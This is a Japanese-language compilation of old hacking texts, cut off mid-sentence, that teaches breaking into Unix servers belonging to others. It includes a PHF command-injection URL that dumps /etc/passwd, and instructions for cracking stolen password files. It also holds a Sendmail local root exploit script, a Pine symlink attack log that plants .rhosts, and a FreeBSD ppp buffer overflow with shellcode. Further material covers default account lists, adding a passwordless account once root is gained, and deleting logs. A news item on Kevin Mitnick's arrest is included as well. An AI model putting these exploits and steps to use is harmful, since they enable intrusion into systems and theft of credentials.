TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh これは一般的なPassword Fileの例である。Super UserとはROOTアクセスを許可 するアカウントの事である。そしてファイルの重要なパートでもある。 root:x:0:1:Superuser:/: ftp:x:202:102:Anonymous ftp:/u1/ftp: ftpadmin:x:203:102:ftp Administrator:/u1/ftp これはPassword Fileのもう一個の例である。しかしここでは前者の例と一部異 なる部分がある。そう、Shadow化されているのである。Shadowed Passwordは実 際のPassword Fileを閲覧、そしてコピーさせないようにしているのである。こ れはPassword CrackerとDictionary Maker(のちに説明)にとって頭の痛い部分 でもある。下記はPassword File化されたPassword Fileのもう一つの例である。 root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false Shadowed PasswordとはDES化されたパスワードの場所に"x"の文字が表示されている。 ここまでで実際のPassword Fileがどういう物が分かっただろう。そしてShadowed 化されたPassword Fileと普通のPassword Fileの違いも理解出来たはず。ではこ こから実際にこれらをCrackする方法の説明に入る。 Password FileをCrackする事自体は見て感じる程難しい事ではない。しかしシス テムによってファイルの種類が異なるのである。1)先ず第一歩としてPassword FileをコピーもしくはDownloadする。2)二番目にPassword CrackerとDictionary Makerの2つを見つける。一応完璧にPassword FileをCrackするソフトなど存在 しなくても、実際幾つか利用度の高いPassword Crackerがあるので紹介する。私 はCracker Jack、 John the Ripper、 Brute Force Cracker、そしてJack the Ripperを推薦する。そして次にDictionary Makerか辞書を見つける。実際にCracking Programを実行するとPassword Fileを聞いて来る。ここで辞書(Dictionary Maker)の出番である。これに関しては巷のHacker関連Webpageでダウンロード出 来る。そしてDictionary Makerとは自動的にUSERが指定した設定に基づいてアル ファベットの可能な組み合わせ全てを試すソフトである。(ASCII、小文字、数 字も含まれる)3)ここまで出来たら次にPassword Cracker起動させ、画面の支持 に従えばいい。 The PHF Technique ----------------- 正直なとこ、これに関してここで説明するかどうか迷った。実際にこのテクニック は知れ渡っているし、サーバーもこのテクニックに関するバグを見つけては修復 してしまっている。しかし未だにPHFに関する問い合わせがあるので、ここで紹介 しておく。 PHFテクニックはPassword Fileを入手する方法の中で最も簡単な方法である。 (しかし95%の確率で成功しない)とりあえず方法とは、ただブラウザを 開き、下記のURLを入力すればいい。 http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd 上の例のwebpage_goes_here部分に自分がハックしたいサーバーのドメイン名を 入力するのである。例としてもしwww.webpage.comというドメインのPassword File を入手したいなら下記のように入力する。 http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd そしてこれだけでいい。後は表示されたPassword Fileをコピーすればいいのである。 Telnet and Exploits ExploitsテクニックはWebPageをハックするには一番良い方法である。しかし FTPやPHFと比べて難しいのも事実である。Exploitsを行なう前に先ずTELNET プログラムが必要である。ネットを検索すれば沢山のTELNETプログラムが落 ちているので、これをダウンロードする。 可能ならアタックするターゲットのISPの正規アカウント(自分のアカウント) を得るのがベストである。Exploitsとは、システム内のバグやエラーを見つけ だし、そこからROOTアクセスを許可する仕組みになっている。巷には膨大な 数のExploitsが存在するので、それぞれ用途に注意し実行に移すように。とり あえずこのテキストの最後でも幾つか紹介しておくが、Exploitsは無限である。 下記のExploitとはSendmail v.8.8.4として知られている物である。 =================================== cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi ================================ 次に紹介するExploitはPine Exploitと呼ばれ、LINUX用である。 ================================ hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + + catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors =================================== そして最後に紹介するのはFreeBSDの為に書かれたテスト用Exploitスクリプト である。もしうまく作動しないなら、数字を変えて試してみてほしい。 =================================== #include #include #include #define BUFFER_SIZE 156 /* size of the bufer to overflow */ #define OFFSET -290 /* number of bytes to jump after the start of the buffer */ long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */ int i,j; buf = malloc(4096); /* fill start of bufer with nops */ i = BUFFER_SIZE-strlen(execshell); memset(buf, 0x90, i); ptr = buf + i; /* place exploit code into the buffer */ for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr; *ptr = 0; setenv("HOME", buf, 1); execl("/usr/sbin/ppp", "ppp", NULL); } =================================== さて、ここでROOTを得られた。では次にどうする?それはアナタ次第である。し かし私が勧めるのはパスワードを変更してしまうことである。方法はいたって簡 単で、TELNETでLOGINし、ただpasswdと入力すればいいだである。そうすればシス テムが前のパスワードを聞いて来るのでそれを入力、すると新しいパスワードを 聞いて来るので、そこに自分の指定したいパスワードを入れればいいだけである。 これで等分の間はファイルのUpLoad、LOGのDelete等といった事が出来る。 J Psychoticでは我々独自のExploitを書き、近日公開する予定なので、そちらに も注目していただきたい。もしアナタが真剣ににHACKINGについて学びたいので あれば、Unix Bibleをダウンロードすることを勧める。 ~~PSYCHOTIC~~ How to become a Unix Hacker Author: van Hauser / THC で、お前はUNIX Hackerに成る事を決心したにも関わらず、何から始めればいい か分からないわけだな?まず実際の行動を行う前に下記の内容が明確かどうか 確認すること。 1〕Hackingとは膨大な量の勉強からなる。子供の遊び場みたいな、わずか15分 だけ楽しむみたいな事とは違う。まずシステムをプログラム、そして操作 する方法を学ぶ必要がある。そして彼等がどうやって反応し、リソースコー ドを読むかを調べる必要もある。これは長時間と険しい道のりを超えてや っと得られる賜物である。覚悟すること。 2〕Hackingとは違法行為である。少なくても殆どの国では−−−私は記憶の限り ではオランダとアルゼンチンのみ、Hacking行為を裁く法律が定められていな い−−−現時点においてである。しかしいずれはお前自身にもそれが現実化 するということを理解すること。他人のアカウントを使用し、接続をするだ けで犯罪とみなされ処罰を受ける事もありうるのである。一度裁判官が有罪 判決を進言すれば、その時点でお前は記録に残されるのだ。そうなれば犯罪 歴を持っている人間を雇用する企業など数少ないし、その結果お前の私生活 は完全に狂ってしまうだろう。 3〕Hackingとは時間の浪費の事である。ただ半年間をHackingし続け、それから 3ヵ月以上ブランクを開け、それからまた復帰するなんて事は出来ない。イン ターネット上で時間とは非常に速く進む。新しいUNIXのリリース、新たなバ クや、その回避方法等も次々と浮上する。それでもこの世界に入ると言うなら、 言っておくがそこから幸福を得られるなんと思うな。50%以上のHackingに 関する時間は事実、情報収集に変わってしまう。他のHackerと話し、メールリ ストやニュースグループを読み、WWWやFTPを常に注目する必要がある。 しかし実際にUNIX Hackingへと活気立てるその動機とはなんだろうか。それはお 前次第である。お前はそういう風になりたい、じゃあ何故そういう風に成りたい のかを考える。"The Net" とか"Hackers"みたいな映画なんて忘れろ。あんなの は現実じゃない!。ヒーローを夢見てペンタゴン(アメリカ国防省)にHACKして、 最もセクシーな男となって、全ての女の食いまくっても結局最後は安い給料のセ キュリティー会社に就職するはめになるぞ。−−−−−だからまず自分が何を したいか、自分が何を求めているかを明確にすること。警察がガサ入れに来て、 お前をパクって、そんな傍らで母親が泣いてる姿なんて想像出来るかい? これらの注意点をよく理解すること。これはお前が何をして、何が欲しいかを確か めるものである。 もう一つの注意点として、私は今まで沢山の連中や、中には素晴らしいphreakers/ blueboxersに「どうやってHACKするんですか?」なんて聞かれてきたので、急いで この文章を書き、さらに途中で何度も挫折もした。そしてついにここにおいて公開 する。だから間違えや不完全な所に対して文句なんて言わないでくれ。まぁ俺はそ んなこと気にしちゃいないがな。もしお前がまだこの手の世界に新しいのなら、と にかくこのテキストから出来る限り沢山の事を学んでもらいたい。 |-------------------------- HOW TO START ----------------------------| 1)まずPCに親密になること。馬の慣らし方を学ばない奴がロデオで勝てると思 うか? 2)PC専用で配布されてるUNIXを入手する。LINUX、FreeBSD, Solaris, Sinix etc. SolarisやSinixが高価な値段で売買されてる中、LinuxやFreeBSD は格安な値段で配られている。巷で配布されてるLINUXを入手すれば、本も一 緒についてくるので勧める。そしてPC上でのUNIXの操作を学ぶ必要がある。 例えばディレクトリの変更やコピー、削除、editerコマンドといった基本コ マンドである。 3)UNIXを使うようにする。どうやってするか − それはお前次第だ。学校機関 などで配られているUNIXのデーターベースを使った方がいい。どんな方法に しろ、UNIXを知らなければ話しにならない。 4)何か本を入手する。至る所にあるのだから、近所のお店か、一番良い方法と して大学等に出向いて入手してくる。特に大学だと、連中はUNIXの善し悪し を理解しているから勧める。個人的にはO'Reilly Nutshellの本がお勧めなの だが、大抵の連中はこれを嫌ってAddison Wesleyの本を推奨する。まぁ人は それぞれ意見があるのだからいいだろう。 5)正規のPPPインターネットアカウントかshellアクセスを入手すること。 そしてPGPでencryptしないままHacking情報を他と交換しないこと。プロバ イダーと接続出来るようにお前のUNIX PCを設定しておくこと。稀だが一部 LINUXを提供してる所では、使用説明等を載せたハンドブックを提供している。 この5つのステップを理解し、UNIXの操作を理解した上で(普通なら2ー8週間か かる)次のステップに進む。 |------------------------ LEARN THE BASICS -------------------------| 6)UNIX関連とインターネット上のセキュリティーに関する本を入手する。 私 が見つけたベストな本はGarfinkel & Spafford著、【Practical Unix Security (第二改定版)】である。 これで基本的なセキュリティー問題、UNIXの問題、 人々が犯す間違い等を調べる。 7)インターネットで入手出来るファイルやテキスト等を可能な限り入手する。 WWWやFTP、サーチエンジン等でこれらを調べる。セキュリティー関連のMLに登録 し、ニュースグループ等にも耳を傾ける。IRC等で面白いサイトなんか聞くのも いい。 ここらでスタートを切る。 http://underground.org ftp://onyx.infonexus.com nntp://comp.security.* そして勿論セキュリティー&HACINGシーンのサイトも忘れることないように。 Bugtraq Mailing List -> email : listserv@netspace.org message body : subscribe bugtraq you-real-name 8)ファイルやデーターをしっかり読んで理解する。収集するだけにととどまるな。 |------------------------- BEGIN HACKING ---------------------------| 9)自分以外のアカウントを入手する。知り合いのHackerからでも入手する。 お前自身のアカウントなんかでHACKINGを行わないこと。 10)その他人のアカウントで第一のHACKを行う。まずetcを開く。しかしここ で"How to cover your tracks"を思い出してみろ。つまりこの初めての違 法アカウントは一度きりで使用できなくなる。 11)ypx、remote sendmail exploits、安全性低いNFS exportsなどを使用して さらに沢山のホストを入手する。もし膨大なリストと、自動的にテストを 行ってくれるスクリプトを使用すれば、こんな古い方法でもかなりの量を 得ることが出来る。 12)可能であればシステム内にSnifferをインストールし、ROOTをHACKする。 これでさらに大量のアカウントを入手出来る。 13)exploitスクリプトを試す。これで幾つかは正常に動くはず。そして12番 に戻る。 |----------------------- BECOME A HACKER ---------------------------| なに・・・・ROOTを既にHACKして、未だにお前はHackerじゃないと言う。何故? HackerとはただサイトをHACKしてしてSnifferをインストールするだけではない。 真のHackerとはシステムを理解し、相手がどのように反応するか、そして自らが コントロールすることといった事から快楽を得、バグの発掘や新たな道具の発明 などを試みる連中の事をいう。 14)他のHacker達と連絡を取り合う。情報、経験談、アカウント、exploits やファイルなどを交換しあうのである。 15)Newsgroup、Mailing List、IRCでの会話に注目する。出来るだけ大事なRFC を読み、C言語を習い、自分でソフトをプログラムする。 16)"31337"(エリート)にはなるな。お前がCOOLな奴だということはもう分 かってるし、他人にこの世界の事実をバラす必要はないのだ。普段から普 通通りにふるまい、「どうやってUNIXをHACKするの?」と聞いてくるよう な他の連中に対し助け手を与えるのだ。 17)疲れを見せるな。シーンにとどまり、NEWSGROUPのMLや友達などの情報に つねに耳を傾けること。Hackingを途中でやめるな。 こんなもんで俺から終わりだ・・・・・このテキストで新たな連中が来る事を願 う。非常に安易な文章になってしまったが、これで全てが理解できたと思う。 Ciao... Q)何故UNIXをハックするの? A)知識を得るため Q)もしROOTSが俺の行動を見つけたらどうなるの? A)きっとお前のアカウントは抹消されるだろうね。 Q)UNIXをハックするには何が必要なの? A)脳味噌、一部ソフト Q)UNIXのパスワードをクラックする(盗む)こと自体は簡単だと聞いたんですが、 それには何か特定のソフトウエアが必要だとも聞きました。その辺について解説 お願いします。 A)OK!パスワードをクラックすることはいつでも簡単とは限らないぜ。 UNIXにはetc/passwdというファイルがあるんだ。こいつは全ての正規ユーザー の名前とパスワードを持っている。ここで大事なことだが、いくら全ての パスワードを保管してると言っても、下記のようにフォーマットされて いるんだ。 username:password:UserID:GroupID:description(or real name):homedir:shell (例) ay-haga:sd.XetfEEq:100:100:John Choyi:/usr/ay-haga:/bin/sh ここから次の事が分かる: 1)登録ユーザー名はay-haga 2)本名はJohn Choyi 3)グループIDは100 4)彼のホームディレクトリは/usr/ay-haga で、どれがパスワードなの?ひょっとしてsd.XetfEEqがそうなの?? さぁここで問題だ。もしsd.XetfEEqが本当のパスワードなら、誰もサーバーに UNIXなんて導入しないか、導入してもめちゃくちゃ簡単に盗まれちまうぜ。 ここでの2つめのパスワードディレクトリは、「パスワード」でなきゃい けない。そうだろ?で、これは確かにパスワードなんだ。が、パスワードが DES化されているんだ。 <概要> UNIXにはそれぞれ違った"キーワード"を使って暗号化を図っている。 こられはほとんどは無雑作なアルファベットと数字で成り立っている。で、 これらの暗号は登録をした際に、オペレーティングシステムによって に決められるのである。さて、DES化された文字を解読するということは 結構面倒である。これはほとんど不可能に近いんだ。とくに暗号化されたパスワード ファイルなんてそうだ(パスワードと共にパスワードファイルまで暗号化 するんだ)。今後お前等の周辺で暗号化されたパスワードファイルを解読 したと自称しているヤツがいたら、そいつはホラ吹き野郎だと思いな。 さて、巷には沢山のパスワードクラッカーがいる。しかし奴等は パスワードファイルを解読するよりも、どれかがマッチするまで 全てにサーバーに対し、無雑作に辞典を駆使してパスワードを解読するのである!! Q)でも私はC言語には全然詳しくありません。これでは私は パスワードをクラック出来ないのでしょうか? A)違うね。よく見てみろよ。巷には沢山のCプログラム(パスワードクラッキング) が転がっているぜ。しかもこれらは無料なんだ!! Q)おおっ!!そいつは驚きだっ!!じゃあ何処でそれらのプログラムを入手することが出来る んですか?あと、アナタはどのプログラムを使ってクラッキングしているんですか? A)分かったわかった。いいぜ。俺はインターネットでパスワードクラッカーを 探し求めて、これらを見つけたぜ。 John The Ripper v1.4 http://www.false.com/security/john/ 俺の意見だが、こいつは最高のプログラムだね。俺は一度22分で132個 のパスワードをこいつでクラックしたぜ。こいつはUNIX、WIN95、MS-DOS環境で 私用可能だ。そして4種類ものアタック方法がある。とにかく利用価値はあるぜ!! ダウンロードしろ!!俺を信じなって!!とにかく価値ありだっ! StarCracker(アドレスは現在閉鎖)http://ruscorp.simplenet.com/cracks/starcrak.zip すごく速く作業をこなしてくれるパスワードクラッカーだね。 こいつは最高の辞書攻撃も備えているぜ。使用環境はMS-DOS, 486とそれ以上。 Brute Force For MS-DOS ftp://ftp.fc.net/pub/phrack/underground/misc/brute20.zip シンプルなパスワードクラッカー Brute Force For Unix (its a .c file) http:///www.geocities.com/HotSpring/4023/koo3az.zip とにかく強力!!速い!! 注:これをUNIXで私用する場合、promptがCC のときにファイルネームがCにすること Cracker Jacker ftp://ftp.fc.net/pub/phrack/underground/misc/jack14.zip グレイトなパスワードクラッカー!!要注!! Q)分かりました。ではパスワードをクラックするには何をしたらいいか、順番に に教えてください。 A)OK 例えば君が"kooli.srce.tu"というドメインのパスワードをクラックしたいとしよう。 まずkooli.srce.tuにテルネットする。すると相手が LOGINネームと、そのパスワードを 聞いてくる。もし君がここのホストのアカウントを所持していないのであれば、 次の例を挑戦してみよう。 ACCOUNT PASSWORD ------- -------- root root - Rarely open to hackers sys sys / system / bin bin sys / bin mountfsys mountfsys adm adm uucp uucp nuucp anon anon anon user user games games install install demo demo umountfsys umountfsys sync sync admin admin guest guest daemon daemon もしこれらでもログイン出来ないのであれば、まず予想を立ててみよう。 それか次のテルネットの表示に注目してみること。 (例) % telnet looki.srce.tu trying 132.20.21.1 connected to looki.srce.tu Escape character is ]" Looki company , 1996 - 1997 login : 多分これならompanyかcomapny9かlooki97かlooki96かkooli97か、それとも1997look なら妥当だろう。ポイントはつかめた? よし!じゃあ仮に君が既にドメインのアカウントを持っているとしよう。 まず何をしたらいいのかな?ok!これがまずpromptですることだ。 Step(1) pico /etc/passwd picoとは"編集"の意味。usage:pico"ファイルネーム"はMS-DOSのEDIT:"ファイルネーム" みたいなものだ。 picoウインドウが現われて/etc/passwdを開く。 そこには沢山のラインが引かれている が、それらは次にように構成されている。 username:password:UserID:GroupID:description(or real name):homedir:shell (俺は既にこの事に関して説明したよな?) Step(2) このファイルをcontrol+Oコマンドで君のアカウントにセーブする。 そしたらセーブする場所を聞いてくるが、この時の標準は/etc/passwd になっているので、(ここはROOT以外セーブするな!!)これを削除し、 変わりに違うファイル場所を指定する。 (例):/etc/passwdと、書かれている これを :basketball(か、アナタの好きなファイル名)に変える Step(3) CONTROL+Xコマンドで picoコマンドを止める Step(4) アナタのPCにbasketballという名のファイルをアップロードする。 これには2通りある。 a-フロッピーにまずコピーして、それからPCにコピーする b-ターミナルにファイルをそのままアップロードする。これは ただ集中すればとても簡単な作業である (例) ls("dir"みたいなモンだ) basketball phoenix.irc salim ayneela.txt sx basketball sx : sending basketball ここでアナタのターミナルにファイルを受信させよう。 それは自分で受信コマンドとか、それに関するコマンドを調べてくれ。 もしこれでも出来なかったら: man sz それか man sx これで sx, sz と sy.のコマンド操作を表示してくれる Step(5) どれでもいいからUNIX用パスワードクラッカーを起動させる。 それでさっそくトライだ!! Step(6) Be happy!!あとは適当に好きな事しな Q)私はアナタの言った事を全てしましたが、どれもうまくいきませんでした A)それは: 1)パスワードファイルがシャドウ化されてた。 2)クラックプログラムが正常に作動していない 3)それか、ひょっとしたらパスワードがシャドウ化(shadow)されて いるのかも。え?この意味だって?俺が言ってるようにパスワードの構成とは; username:password:UserID:GroupID:description(or real name):homedir:shell (例A) ay-haga:sd.XetfEEq:100:100:John Choyi:/usr/ay-haga:/bin/sh この場合パスワードはシャドウ化されていないから、これはこれでいい。 (例B) ay-haga:x:100:100:John Choyi:/usr/ay-haga:/bin/sh john:x:100:100:John Choyi:/usr/john:/bin/sh この例だと、パスワードはシャドウ化されている。 俺はパスワードファイル構成における2つ目のファイルには、パスワード が置かれていると言ったが、場合によっては(X)というアルファベット一文字 しか置かれていない時がある。それか他の一文字(-とか*)なども見られる。 この場合はまずシャドウ化されたパスワードを普通の暗号化パスワードに 戻させなければいけない。例えばunshad.c、shadow.c、そしてdeshad.c などといったCプログラムである。こられのプログラムは、シャドウ化 されたパスワードを解読してくれる。(kaware3氏のHPからDL可) (4)クラックソフトが通常通り作業しない 多分お前が100%ダウンロードしなかったか、何か大事なファイルを 失っているんだろう。 Q)OK!色々情報提供してくれてありがとう!でも・・・もう一個質問が あるんですが、仮に私がハックしたいUNIXホストにログイン出来ない場合、 何をすればいいのでしょうか。 A)ここでちょっとしたトリックをお見せしよう。でもこれには条件 としてお前がネットスケープを持ってる事と、その侵入したいホストがHP を持っているという事だ。 まずロケーションを開く: http://XXX/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd ここでのXXXとは、そのホストのHPのアドレスの事である。 (例) 仮にお前がkooli.kesha.tuのサーバーに侵入したいとしよう。 ここでまずこのホストが自分のHPを持っているかを調べる。 通常なら www.kooli.kesha.tuかkooli.kesha.tuが妥当だろうね。 まぁ聞いた方がマシかもしれないけど。 で、仮にこのホストのHPがwww.kooli.kesha.tuだったら、 下記のアドレスを開く。 http://www.kooli.kesha.tu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd しかし、この方法が必ずしも使えるとは限らないので、そこは覚えておくように。 Q)なるほど、じゃあ仮にワタシはここのホストをハックしたとして、 このホストに自分を登録したいとなればどうすればいいんですか? A)まず初めに、ROOTが無いと駄目だね。ROOTを得るには沢山のプログラム がある。多分ハッキングCDとか、他のプログラム内部で見つけられる よ。 じゃあ仮にROOTを得たとしよう。まず何をするかって? a- pico /etc/passwd (これでパスワードファイルを編集する) b- 下記の場所にユーザーを登録する 何でもいい::100:100:何かめちゃくちゃ書いちゃえ:homedir:/bin/sh homedir --------/ 他の正規ユーザーのhomedirを見る (例) パスワードファイルを編集する場合 salim:QFdflktr..ee/:100:100:salim ali koosha:/users/salim:/bin/sh 下記を足す 何でもいい::100:100:何かめちゃくちゃ書いちゃえ:/users/whatever:/bin/sh 次回からその「何とか」でログインする時、その「何とか」にはパスワードが無い って事を頭に入れとくように。自分でパスワードを作る場合は下記を打つ。 % passwd で、ファイルをセーブし、control+Oでとりあえず/etc/passwdから去る。 幸運を祈る。 “America's Most Wanted Computer Hacker”(アメリカ国内で最も危険なコンピュ ーターHACKER)と称された男、 Kevin Mitnick(ケビン ミトニック)がアメリカ はノースカロライナ州のRaleighにある彼の自宅で朝、逮捕された。 ミトニックは自らの行為から身を隠す為、ここ2年に渡ってロサンゼルスとシアトル を移動していた。彼の不正行為は結局、最近ミトニックから被害に遭わされたSan Diego にあるSupercomputer Centerのコンピューターセキュリティースペシャリスト、下村努 によって捕まってしまったのである。下村は逮捕の2ヵ月前のクリスマス、彼が書き 続けていたセキュリティープログラムをケビンによって盗まれてしまった。しかしこ こでのケビンの汚点とは、その盗んだプログラムを実際に使用、これが元となって 犯人特定に結びついてしまったのである。下村は逮捕1週間前までに、ミトニック (当時31才)がノースカロライナのRaleigh周辺から携帯電話をモデムに接続して いるということを測定、電話会社と携帯電話会社の協力を得て水曜日の朝にミトニック を特定出来たのである。 正式コメントによると、この逮捕劇により高校時代からHackingやPhreakingを行っ ていたこの男の経歴が終幕されるということである。一つ上げると、ミトニックは コロラド州にあるNorth American Air Defense Command(北アメリカ航空防衛指揮?) のコンピューターにも侵入していたのである。 『彼の脅迫概念は彼を転落させた』合衆国司法秘書官代理人(?)、ケイシーキューニン ハムのコメントである。『彼の携帯電話によるhackingやphreakingは、我々が追跡 出来る跡を残してくれた』 ミトニックは“Conder”というHACKER NAMEで知られており、彼曰くこの名前は映 画“Three Days of the Condor”で俳優Robert Redfordが政府からの逃亡劇を内容 とした所から取ったものである。 彼はロサンゼルスで育ち、1988年には重度 によるハリウッドスター達の電話回線を切断等といったHacking/Phreaking行為で 有罪判決を言い渡されたこともある。しかし短期による刑務所生活の後の保護観 察期間にも関わらず、彼のその「破壊活動」は止むことなく、ついにはミトニッ クに対し執行猶予を取り消し、さらに再度刑務所に送る事を通告した時、ミトニック はなんと彼女の電話回線を切断、逃亡に踏み切ったのである。彼は天才なハズな のでは? 1989年、ロサンゼルスにある連邦裁判所はミトニックを才気ある、コンピュー ターとジャンクフードに溺れた若い男と称した。ミトニックはアメリカ及びイギリ スにおいて、コンピューターネットワークと電話回線システムに浸潤し続けていた のである。 しかし政府はミトニックのNSA(National Security Agency)のコンピューター侵入 を確認したにも関わらず、その行為に対し有罪判決を言い渡さなかった。しかしミトニ ックを危険な人物と判断、裁判所の許可を得てミトニックの電話回線を全て切断する 手続きを取った。ミトニックが今後電話回線を使用して不正アクセスを行うのを防ぐ 為である。 1988年初期、ミトニックはDEC(Digital Equipment Corporation)のコンピュー ターネットワークに不正アクセスし、データーを盗んだ事を認めた。さらに彼は16 のMCI長距離電話のアクセスコードを窃盗、実際に使用していたことも容認した。こ れにより裁判での判決では、全ての有罪に対し数年間の禁固刑を進言し、その後1年 間の保護観察を言い渡した。出所後、ミトニックの保護観察が始まったが、監視人が ミトニックのあまりの行動に、保護観察を破棄し、再度ミトニックを刑務所に入れる 事を警告した時に彼の反応はappropriate computerをハックし彼女の電話回線サービ スを切断、逃走に踏み切った。 FBIは1992年の秋、ミトニックがカリフォルニア州はCalabasasの個人調査会社で 働いるという情報をPacific Bell社のコンピューターを通じて入手、捜査に着手した のだが、逮捕直前の所で本人は気づき逃走した。しかし下村は政府機関と慎重に連絡 をとり、ミトニックの特定に努めた。 1995年2月15日の水曜日、ミトニックは保護観察による違反と、新たなコンピュ ーター犯罪による起訴の為にノースカロライナはRaleighの裁判所に戻ってきた。ロサ ンゼルスの合衆国補代理任(?)David Schindlerはミトニックに対し、サンディエゴ、 シアトル、そしてコロラドでのミトニックの余罪も含め審判する事をは発表した。さら にミトニックを危険な人物だと判断、今後彼を自由にさせとけばまたさらに犯罪を犯す 危険もあった為、裁判所はミトニックに保釈を認めない事を決定、そしてまた彼の周辺 の電話回線の使用限定までも決めたのである。 ミトニックは天才だった。しかし常識感覚については欠けていた所もあった。普通なら 連邦保護観察官に喧嘩など売らないだろう;同じ目に遭わせようと電話回線を切断する なんて事はしないし、相手が電話をかけてきたからって逃げる事もしないし、さらに逃 亡生活真っ最中に下村努みたいな男のデーターを盗むような真似など普通はしない。 水曜日、下村は裁判での弁論の為に裁判所に出向いた。裁判終了後、調停を去ろうとし た彼の前に、手錠に足かせをはめられたミトニックが近寄ってきた。2人とも今回初め て顔を合わしたのである。そしてミトニックは言った。「こんにちは、ツトム。 私はアナタの技術に敬服しますよ」 下村はかるくうなずき、その場を去っていった。 ここで覚えておいてもらいたいのは、アメリカ国内の憲法上、裁判官か裁判での陪審任 が罪の証明が十分で無い限り、ケビンミトニックの潔白な事までを調べてくるのである。 Patrick Townson PHF Vulnerability PHFとは、NCSA httpdとAppache www serversから配布されいたプログラムである。 個人的にこのPHF方法を人には勧めたくはない。とにかく、話しを戻してPHFの問 題点として、貧弱なマシンでも簡単にどんなファイルもアクセス出来てしまうの である(PW FILEも含む)。使用はいたって簡単。PHFはHTTPプロトコルを使用、 このため普通のWEBブラウザでも可能なのである。PHFはサーバーのCGIディレクト リに位置する。PHFを使ってPW FILEを入手する時のコマンドは下記である。 http://your.host.name/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd your.host.nameの部分に自分がハックしたいサーバーの名前を入れる。例えば誰 かがwww.cool.comというサーバーのシステムをPHFしてみようと思った場合、 http://www.cool.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd と、ブラウザのLOCATIONに打ち込めばいいのである。 もしお前がシスアドで、不正ユーザーによるPHFバグのアクセスに頭を悩ましてい る場合、この方法で簡単にこれを制御出来る。PHP.Hファイルの最後に次の文字を 足せばいい。 #define PATTERN_RESTRICT".*\\.phtml$" この文章でPHFを制御でき、PHTLの拡張子のみを表示させることができる。(この ためPASSWD等の大事なファイルの第三者への移動も防げる) PHFバグは特に海外のシステムのように、薄弱でプロテクトされていないシステ ムで見られる(特に日本) Duncan Silver of U2 www.hackersclub.com/uu FIRST INSTALLMENT: Getting URLs through Telnet. 概要: よぅ!!今回また違う知識を教える時間がやってきたぜ。今回はHTTPについて説 明しようじゃないか。そうだよ。Hyper Text Transfer Protocolの事だ!で、こ の話題に突っ込む前に、まず幾つかの連中にこの場を借りて感謝したい。 Optik Lenz は俺の仕事を読んで、気に入ってもらい、さらに俺がLOUのメンバーになるにあた 